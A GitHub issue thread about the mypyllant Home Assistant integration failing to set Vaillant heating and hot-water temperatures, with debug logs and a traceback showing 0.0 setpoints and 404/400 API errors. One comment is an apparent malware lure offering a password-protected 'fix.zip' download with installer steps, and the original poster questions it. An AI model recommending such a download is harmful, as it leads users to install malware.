### ISSUE TITLE
Setting the temperature not possible

### ISSUE THREAD

**Issue by PatOne18** [signalkraft/mypyllant-component#206]
### Before submitting a new issue

- [y] I [redownloaded the latest release](https://my.home-assistant.io/redirect/hacs_repository/?owner=signalkraft&repository=mypyllant-component) and restarted Home Assistant
- [y] I've checked [known issues](https://signalkraft.com/mypyllant-component/#known-issues)
- [y] I've [enabled debug logs](https://signalkraft.com/mypyllant-component/3-contributing/#debugging) and attached the relevant logs to this ticket

### Problem description

I can not set the temperature - it always shows 0.0°C. If I set e.g. 21,0°C if falls back to 0,0°C after five seconds and my VRC700/4 displays as desired temperature 0.0°C too. 
I reinstalled the latest release, restarted HA and my Vaillant boiler but without success.

https://github.com/user-attachments/assets/73edf6b1-d17f-44a8-8903-fe7b61fa8e97

https://github.com/user-attachments/assets/e1883eb0-60f1-41a4-8145-2c3693d05824

### Logs

```
2024-08-28 12:16:50.288 WARNING (MainThread) [homeassistant.util.loop] Detected blocking call to listdir with args ('/config/deps/lib/python3.12/site-packages',) inside the event loop by custom integration 'mypyllant' at custom_components/mypyllant/__init__.py, line 90: version("myPyllant"), (offender: /usr/local/lib/python3.12/importlib/metadata/__init__.py, line 680: return os.listdir(self.root or '.')), please create a bug report at https://github.com/signalkraft/mypyllant-component/issues

024-08-28 12:43:00.841 DEBUG (MainThread) [myPyllant.http_client] Starting GET to https://api.vaillant-group.com/service-connected-control/vrc700/v1/systems/205e9e32-bae9-468d-87b2-0db1f1e7d09f
2024-08-28 12:43:00.915 DEBUG (MainThread) [myPyllant.http_client] Got response for GET to https://api.vaillant-group.com/service-connected-control/vrc700/v1/systems/205e9e32-bae9-468d-87b2-0db1f1e7d09f: {"state":{"system":{"outdoorTemperature":24.898438,"outdoorTemperatureAverage24h":23.898438,"systemWaterPressure":1.2,"legionellaProtectionStartWeekday":"OFF","energyManagerState":"STANDBY","systemOff":false},"zones":[{"index":0,"desiredRoomTemperatureSetpointHeating":0.0,"desiredRoomTemperatureSetpoint":0.0,"currentRoomTemperature":25.5625,"currentRoomHumidity":65.0,"currentSpecialFunction":"QUICK_VETO"}],"circuits":[{"index":0,"circuitState":"STANDBY","currentCircuitFlowTemperature":30.0,"heatingCircuitFlowSetpoint":0.0,"calculatedEnergyManagerState":"HEATING_STANDBY"}]},"properties":{"system":{"controllerType":"VRC700","controllerRevision":"R4","systemScheme":1,"backupHeaterType":"CONDENSING","backupHeaterAllowedFor":"DOMESTIC_HOT_WATER_AND_HEATING","temporaryAllowBackupHeater":"DISABLED","moduleConfigurationVR71":3,"energyProvidePowerCutBehavior":"DISABLE_HEATPUMP","smartPhotovoltaicBufferOffset":10.0,"externalEnergyManagementActivation":false},"zones":[{"index":0,"isActive":true,"zoneBinding":"CENTRAL_CONTROL","associatedCircuitIndex":0}],"circuits":[{"index":0,"mixerCircuitTypeExternal":"HEATING","heatingCircuitType":"DIRECT_HEATING_CIRCUIT","isCoolingAllowed":false}]},"configuration":{"system":{"continuousHeatingStartSetpoint":-12.0,"alternativePoint":-21.0,"heatingCircuitBivalencePoint":0.0,"domesticHotWaterBivalencePoint":-7.0,"adaptiveHeatingCurve":false,"domesticHotWaterMaximumLoadingTime":45,"domesticHotWaterHysteresis":5.0,"domesticHotWaterFlowSetpointOffset":25.0,"maxFlowSetpointHeatpumpError":25.0,"domesticHotWaterMaximumTemperature":80.0,"hybridControlStrategy":"BIVALENCE_POINT","paralellTankLoadingAllowed":false},"zones":[{"index":0,"general":{"name":"*******","holidayStartDateTime":"2022-04-13T00:00:00Z","holidayEndDateTime":"2022-04-17T00:00:00Z","holidaySetpoint":19.0},"heating":{"operationModeHeating":"AUTO","setBackTemperature":20.0,"dayTemperatureHeating":20.0,"timeProgramHeating":{"metaInfo":{"minSlotsPerDay":0,"maxSlotsPerDay":3,"setpointRequiredPerSlot":false},"monday":[{"startTime":340,"endTime":540},{"startTime":840,"endTime":1350}],"tuesday":[{"startTime":340,"endTime":540},{"startTime":840,"endTime":1350}],"wednesday":[{"startTime":340,"endTime":540},{"startTime":840,"endTime":1350}],"thursday":[{"startTime":340,"endTime":540},{"startTime":840,"endTime":1350}],"friday":[{"startTime":340,"endTime":540},{"startTime":840,"endTime":1350}],"saturday":[{"startTime":390,"endTime":1340}],"sunday":[{"startTime":390,"endTime":1340}]}}}],"circuits":[{"index":0,"heatingCurve":2.1999993,"heatingFlowTemperatureMinimumSetpoint":25.0,"heatingFlowTemperatureMaximumSetpoint":58.0,"heatDemandLimitedByOutsideTemperature":21.0,"heatingCircuitFlowSetpointExcessOffset":0.0,"epsilon":2.0,"setbackModeEnabled":true,"roomTemperatureControlMode":"THERMOSTAT_FUNCTION"}]}}
2024-08-28 12:43:00.919 DEBUG (MainThread) [myPyllant.http_client] Starting GET to https://api.vaillant-group.com/service-connected-control/end-user-app-api/v1/emf/v2/205e9e32-bae9-468d-87b2-0db1f1e7d09f/currentSystem
2024-08-28 12:43:00.997 DEBUG (MainThread) [myPyllant.http_client] Got response for GET to https://api.vaillant-group.com/service-connected-control/end-user-app-api/v1/emf/v2/205e9e32-bae9-468d-87b2-0db1f1e7d09f/currentSystem: {"system_type":"UNKNOWN","has_emf_capable_devices":false,"primary_heat_generator":null,"secondary_heat_generators":[],"electric_backup_heater":null,"solar_station":null,"ventilation":null,"gateway":null}
2024-08-28 12:43:00.999 DEBUG (MainThread) [myPyllant.http_client] Starting GET to https://api.vaillant-group.com/service-connected-control/end-user-app-api/v1/systems/205e9e32-bae9-468d-87b2-0db1f1e7d09f/meta-info/connection-status
2024-08-28 12:43:01.073 DEBUG (MainThread) [myPyllant.http_client] Got response for GET to https://api.vaillant-group.com/service-connected-control/end-user-app-api/v1/systems/205e9e32-bae9-468d-87b2-0db1f1e7d09f/meta-info/connection-status: {"connected":true}
2024-08-28 12:43:01.075 DEBUG (MainThread) [myPyllant.http_client] Starting GET to https://api.vaillant-group.com/service-connected-control/end-user-app-api/v1/systems/205e9e32-bae9-468d-87b2-0db1f1e7d09f/diagnostic-trouble-codes
2024-08-28 12:43:01.163 DEBUG (MainThread) [myPyllant.http_client] Got response for GET to https://api.vaillant-group.com/service-connected-control/end-user-app-api/v1/systems/205e9e32-bae9-468d-87b2-0db1f1e7d09f/diagnostic-trouble-codes: [{"serialNumber":"21191100201972070082008874N7","articleNumber":"0020197207","codes":[]},{"serialNumber":"21173000100219200001005290N8","articleNumber":"0010021920","codes":[]},{"serialNumber":"21190800202529220938008008N4","articleNumber":"0020252922","codes":[]}]
2024-08-28 12:43:01.164 DEBUG (MainThread) [myPyllant.http_client] Starting GET to https://api.vaillant-group.com/service-connected-control/end-user-app-api/v1/api/v1/ambisense/facilities/205e9e32-bae9-468d-87b2-0db1f1e7d09f/capability
2024-08-28 12:43:01.277 DEBUG (MainThread) [myPyllant.http_client] Got response for GET to https://api.vaillant-group.com/service-connected-control/end-user-app-api/v1/api/v1/ambisense/facilities/205e9e32-bae9-468d-87b2-0db1f1e7d09f/capability: {"rbrCapable":true}
2024-08-28 12:43:01.279 DEBUG (MainThread) [myPyllant.http_client] Starting GET to https://api.vaillant-group.com/service-connected-control/end-user-app-api/v1/api/v1/ambisense/facilities/205e9e32-bae9-468d-87b2-0db1f1e7d09f/rooms
2024-08-28 12:43:01.382 DEBUG (MainThread) [myPyllant.http_client] Got response for GET to https://api.vaillant-group.com/service-connected-control/end-user-app-api/v1/api/v1/ambisense/facilities/205e9e32-bae9-468d-87b2-0db1f1e7d09f/rooms: []
2024-08-28 12:43:01.383 DEBUG (MainThread) [myPyllant.http_client] Starting GET to https://api.vaillant-group.com/service-connected-control/end-user-app-api/v1/eebus/energy-management/205e9e32-bae9-468d-87b2-0db1f1e7d09f
2024-08-28 12:43:01.451 DEBUG (MainThread) [myPyllant.http_client] Got response for GET to https://api.vaillant-group.com/service-connected-control/end-user-app-api/v1/eebus/energy-management/205e9e32-bae9-468d-87b2-0db1f1e7d09f: {"energyManager":{"available":false,"compatible":false},"energyManagementStatus":{"thermalStorage":{"domesticHotWater":{"available":false,"selected":false},"heatingBufferCylinder":{"available":false,"selected":true}}}}
2024-08-28 12:43:01.453 DEBUG (MainThread) [myPyllant.http_client] Starting GET to https://api.vaillant-group.com/service-connected-control/end-user-app-api/v1/ship/205e9e32-bae9-468d-87b2-0db1f1e7d09f/self
2024-08-28 12:43:01.548 DEBUG (MainThread) [myPyllant.http_client] Got response for GET to https://api.vaillant-group.com/service-connected-control/end-user-app-api/v1/ship/205e9e32-bae9-468d-87b2-0db1f1e7d09f/self: {"ski":"4533e8d203f5351c0fd291504dd9ae6053c2fd91","brand":"Vaillant","type":"Gateway","model":"VR920","spineEnabled":false,"spineEnabledStatus":"DETERMINED","spineCapable":true}
2024-08-28 12:43:01.552 DEBUG (MainThread) [myPyllant.models] Creating related models from state: {'brand': 'vaillant', 'home': Home(extra_fields={'migration_finished_at': '2024-02-29T06:08:35.368596083Z', 'online_state': 'ONLINE'}, country_code='AT', timezone=zoneinfo.ZoneInfo(key='Europe/Vienna'), nomenclature='VR 920', serial_number='21190800202529220938008008N4', state='CLAIMED', system_id='205e9e32-bae9-468d-87b2-0db1f1e7d09f', home_name='******', address={'street': '******', 'extension': None, 'city': '******', 'postal_code': '******', 'country_code': 'AT'}, product_information='VR920', migration_state='FINISHED', cag=False, firmware_version='0357.40.35', firmware={'version': '0357.40.35', 'connected_to_old_io_t_platform': None, 'update_enabled': True, 'update_required': False}, product_metadata={'product_type': 'VR920', 'production_year': '19', 'production_week': '08', 'article_number': '0020252922'}), 'timezone': zoneinfo.ZoneInfo(key='Europe/Vienna'), 'control_identifier': <ControlIdentifier.VRC700: 'vrc700'>, 'connected': True, 'diagnostic_trouble_codes': [{'serial_number': '21191100201972070082008874N7', 'article_number': '0020197207', 'codes': []}, {'serial_number': '21173000100219200001005290N8', 'article_number': '0010021920', 'codes': []}, {'serial_number': '21190800202529220938008008N4', 'article_number': '0020252922', 'codes': []}], 'rts': None, 'mpc': None, 'current_system': {'system_type': 'UNKNOWN', 'has_emf_capable_devices': False, 'primary_heat_generator': None, 'secondary_heat_generators': [], 'electric_backup_heater': None, 'solar_station': None, 'ventilation': None, 'gateway': None}, 'ambisense_capability': True, 'energy_management': {'energy_manager': {'available': False, 'compatible': False}, 'energy_management_status': {'thermal_storage': {'domestic_hot_water': {'available': False, 'selected': False}, 'heating_buffer_cylinder': {'available': False, 'selected': True}}}}, 'eebus': {'ski': '4533e8d203f5351c0fd291504dd9ae6053c2fd91', 'brand': 'Vaillant', 'type': 'Gateway', 'model': 'VR920', 'spine_enabled': False, 'spine_enabled_status': 'DETERMINED', 'spine_capable': True}, 'state': {'system': {'outdoor_temperature': 24.898438, 'outdoor_temperature_average24h': 23.898438, 'system_water_pressure': 1.2, 'legionella_protection_start_weekday': 'OFF', 'energy_manager_state': 'STANDBY', 'system_off': False}, 'zones': [{'index': 0, 'desired_room_temperature_setpoint_heating': 0.0, 'desired_room_temperature_setpoint': 0.0, 'current_room_temperature': 25.5625, 'current_room_humidity': 65.0, 'current_special_function': 'QUICK_VETO'}], 'circuits': [{'index': 0, 'circuit_state': 'STANDBY', 'current_circuit_flow_temperature': 30.0, 'heating_circuit_flow_setpoint': 0.0, 'calculated_energy_manager_state': 'HEATING_STANDBY'}]}, 'properties': {'system': {'controller_type': 'VRC700', 'controller_revision': 'R4', 'system_scheme': 1, 'backup_heater_type': 'CONDENSING', 'backup_heater_allowed_for': 'DOMESTIC_HOT_WATER_AND_HEATING', 'temporary_allow_backup_heater': 'DISABLED', 'module_configuration_v_r71': 3, 'energy_provide_power_cut_behavior': 'DISABLE_HEATPUMP', 'smart_photovoltaic_buffer_offset': 10.0, 'external_energy_management_activation': False}, 'zones': [{'index': 0, 'is_active': True, 'zone_binding': 'CENTRAL_CONTROL', 'associated_circuit_index': 0}], 'circuits': [{'index': 0, 'mixer_circuit_type_external': 'HEATING', 'heating_circuit_type': 'DIRECT_HEATING_CIRCUIT', 'is_cooling_allowed': False}]}, 'configuration': {'system': {'continuous_heating_start_setpoint': -12.0, 'alternative_point': -21.0, 'heating_circuit_bivalence_point': 0.0, 'dhw_bivalence_point': -7.0, 'adaptive_heating_curve': False, 'dhw_maximum_loading_time': 45, 'dhw_hysteresis': 5.0, 'dhw_flow_setpoint_offset': 25.0, 'max_flow_setpoint_heatpump_error': 25.0, 'dhw_maximum_temperature': 80.0, 'hybrid_control_strategy': 'BIVALENCE_POINT', 'paralell_tank_loading_allowed': False}, 'zones': [{'index': 0, 'general': {'name': 'Heizkreis', 'holiday_start_date_time': '2022-04-13T00:00:00Z', 'holiday_end_date_time': '2022-04-17T00:00:00Z', 'holiday_setpoint': 19.0}, 'heating': {'operation_mode_heating': 'AUTO', 'set_back_temperature': 20.0, 'day_temperature_heating': 20.0, 'time_program_heating': {'meta_info': {'min_slots_per_day': 0, 'max_slots_per_day': 3, 'setpoint_required_per_slot': False}, 'monday': [{'start_time': 340, 'end_time': 540}, {'start_time': 840, 'end_time': 1350}], 'tuesday': [{'start_time': 340, 'end_time': 540}, {'start_time': 840, 'end_time': 1350}], 'wednesday': [{'start_time': 340, 'end_time': 540}, {'start_time': 840, 'end_time': 1350}], 'thursday': [{'start_time': 340, 'end_time': 540}, {'start_time': 840, 'end_time': 1350}], 'friday': [{'start_time': 340, 'end_time': 540}, {'start_time': 840, 'end_time': 1350}], 'saturday': [{'start_time': 390, 'end_time': 1340}], 'sunday': [{'start_time': 390, 'end_time': 1340}]}}}], 'circuits': [{'index': 0, 'heating_curve': 2.1999993, 'heating_flow_temperature_minimum_setpoint': 25.0, 'heating_flow_temperature_maximum_setpoint': 58.0, 'heat_demand_limited_by_outside_temperature': 21.0, 'heating_circuit_flow_setpoint_excess_offset': 0.0, 'epsilon': 2.0, 'setback_mode_enabled': True, 'room_temperature_control_mode': 'THERMOSTAT_FUNCTION'}]}, 'id': '205e9e32-bae9-468d-87b2-0db1f1e7d09f'}
2024-08-28 12:43:01.562 DEBUG (MainThread) [custom_components.mypyllant.coordinator] Finished fetching myVAILLANT data in 0.862 seconds (success: True)
```

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PatOne18** [comment]
Why should I install a dubious file on my computer ?

**Comment by DanielSoftwareDev** [comment]
i have also problems with setting warmwater temperatur with 404 response on the API call

**Comment by hkcrainer** [comment]
Same here.
Die Aktion water_heater/set_temperature konnte nicht ausgeführt werden. 404, message='Not Found', url='https://api.vaillant-group.com/service-connected-control/end-user-app-api/v1/systems/7c61ffc9-f6ab-4285-b6b2-2f1120b6e489/tli/domestic-hot-water/255/temperature'

**Comment by Terikos** [comment]
I have similar problem. Since couple of days there is not podobne to do ant change. 
Following message is displayed:
Failed to perform the action climate/set_hvac_mode. 404, message='Not Found', url='https://api.vaillant-group.com/service-connected-control/end-user-app-api/v1/systems/ca4dd33b-5a5f-4c3c-afab-dd2001fa136c/tli/zones/1/operation-mode

but it seems that there is problem on Vaillant side. In myVAILLANT app there is not powinięty to do changes either. I have massage that something goes wrong and I should try later.

**Comment by Github-Nutzer** [comment]
I can confirm this, HA-Integration and also APP not working, api.vaillant-group.com seems to be broken since a few days ... :-(

**Comment by fodorg01** [comment]
I have a similar issue, but I have realized that it is (at least partly) because of a weird (and maybe new) behavior of the Vaillant controller / service itself. What I have noticed: if the temperature outside is warm enough (e.g. close to 20 deg.C.), then the heating **"appears to be turned off"**, and actually everywhere:
- This integration shows "off" HVAC mode and "idle" HVAC action, the **set target temperature is shown as 0.0**,
- The myVAILLANT app also doesn't show that heating would be active on its main screen (but, of course, in the settings it shows correctly that it is set to AUTO mode, and also shows the night and day temperature settings correctly).
- Even the display on the thermostat doesn't show if heating would be active.

So in my opinion the only thing this integration could do better is not showing the *set target temperature* as 0.0 in this case.

**Comment by boelle** [comment]
@PatOne18 is this still  an issue?

**Comment by boelle** [comment]
@signalkraft think we can close this one as @PatOne18  does not have an issue anymore

**Comment by MaximusDecimusMeridius-stack** [comment]
Please don't close it. It is still an issue (VR900 with flexotherm). Same error message 404 as @Terikos.

Attached the input:
action: water_heater.set_temperature
target:
  entity_id: water_heater.baukloh_home_domestic_hot_water_0
data:
  temperature: 55



And the stack trace:
Logger: homeassistant.components.websocket_/api.http.connection
Quelle: custom_components/mypyllant/water_heater.py:220
Integration: Home Assistant WebSocket API (Dokumentation, Probleme)
Erstmals aufgetreten: 12:18:29 (1 Vorkommnis)
Zuletzt protokolliert: 12:18:29

[547316222848] Error handling message: Unknown error (unknown_error) Stephan from 

192.168.178.155 (Mozilla/5.0 (Linux; Android 16; SM-A566B Build/BP2A.250605.031.A3; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/142.0.7444.106 Mobile Safari/537.36 Home Assistant/2025.11.3-18924 (Android 16; SM-A566B))

Traceback (most recent call last):
  File "/usr/src/homeassistant/homeassistant/components/websocket_api/decorators.py", line 28, in _handle_async_response
    await func(hass, connection, msg)
  File "/usr/src/homeassistant/homeassistant/components/websocket_api/commands.py", line 979, in handle_execute_script
    script_result = await script_obj.async_run(
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^
        msg.get("variables"), context=context
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    )
    ^
  File "/usr/src/homeassistant/homeassistant/helpers/script.py", line 1833, in async_run
    return await asyncio.shield(create_eager_task(run.async_run()))
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/src/homeassistant/homeassistant/helpers/script.py", line 460, in async_run
    await self._async_step(log_exceptions=False)
  File "/usr/src/homeassistant/homeassistant/helpers/script.py", line 526, in _async_step
    self._handle_exception(
    ~~~~~~~~~~~~~~~~~~~~~~^
        ex, continue_on_error, self._log_exceptions or log_exceptions
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    )
    ^
  File "/usr/src/homeassistant/homeassistant/helpers/script.py", line 556, in _handle_exception
    raise exception
  File "/usr/src/homeassistant/homeassistant/helpers/script.py", line 524, in _async_step
    await getattr(self, handler)()
  File "/usr/src/homeassistant/homeassistant/helpers/script.py", line 1009, in _async_step_call_service
    response_data = await self._async_run_long_action(
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    ...<9 lines>...
    )
    ^
  File "/usr/src/homeassistant/homeassistant/helpers/script.py", line 624, in _async_run_long_action
    return await long_task
           ^^^^^^^^^^^^^^^
  File "/usr/src/homeassistant/homeassistant/core.py", line 2816, in async_call
    response_data = await coro
                    ^^^^^^^^^^
  File "/usr/src/homeassistant/homeassistant/core.py", line 2859, in _execute_service
    return await target(service_call)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/src/homeassistant/homeassistant/helpers/service.py", line 830, in entity_service_call
    single_response = await _handle_entity_call(
                      ^^^^^^^^^^^^^^^^^^^^^^^^^^
        hass, entity, func, data, call.context
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    )
    ^
  File "/usr/src/homeassistant/homeassistant/helpers/service.py", line 902, in _handle_entity_call
    result = await task
             ^^^^^^^^^^
  File "/usr/src/homeassistant/homeassistant/components/water_heater/__init__.py", line 443, in async_service_temperature_set
    await entity.async_set_temperature(**kwargs)
  File "/config/custom_components/mypyllant/decorators.py", line 10, in wrapper
    return await func(self, *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/config/custom_components/mypyllant/water_heater.py", line 220, in async_set_temperature
    await self.coordinator.api.set_domestic_hot_water_temperature(
        self.domestic_hot_water, int(target_temp)
    )
  File "/usr/local/lib/python3.13/site-packages/myPyllant/api.py", line 1006, in set_domestic_hot_water_temperature
    await self.aiohttp_session.patch(
        url, json={"setpoint": temperature}, headers=self.get_authorized_headers()
    )
  File "/usr/local/lib/python3.13/site-packages/myPyllant/http_client.py", line 30, in _request
    return await super()._request(method, str_or_url, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.13/site-packages/aiohttp/client.py", line 904, in _request
    await raise_for_status(resp)
  File "/usr/local/lib/python3.13/site-packages/myPyllant/http_client.py", line 82, in on_raise_for_status
    raise e
  File "/usr/local/lib/python3.13/site-packages/myPyllant/http_client.py", line 79, in on_raise_for_status
    response.raise_for_status()
    ~~~~~~~~~~~~~~~~~~~~~~~~~^^
  File "/usr/local/lib/python3.13/site-packages/aiohttp/client_reqrep.py", line 636, in raise_for_status
    raise ClientResponseError(
    ...<5 lines>...
    )
aiohttp.client_exceptions.ClientResponseError: 400, message='Bad Request, response was: {"title":"MalformedRequestParameters","status":400,"errorCode":"G003"}', url='https://api.vaillant-group.com/service-connected-control/vrc700/v1/systems/d1ef847d-20c5-42e0-99ee-2152fac52f3d/domestic-hot-water/255/temperature'
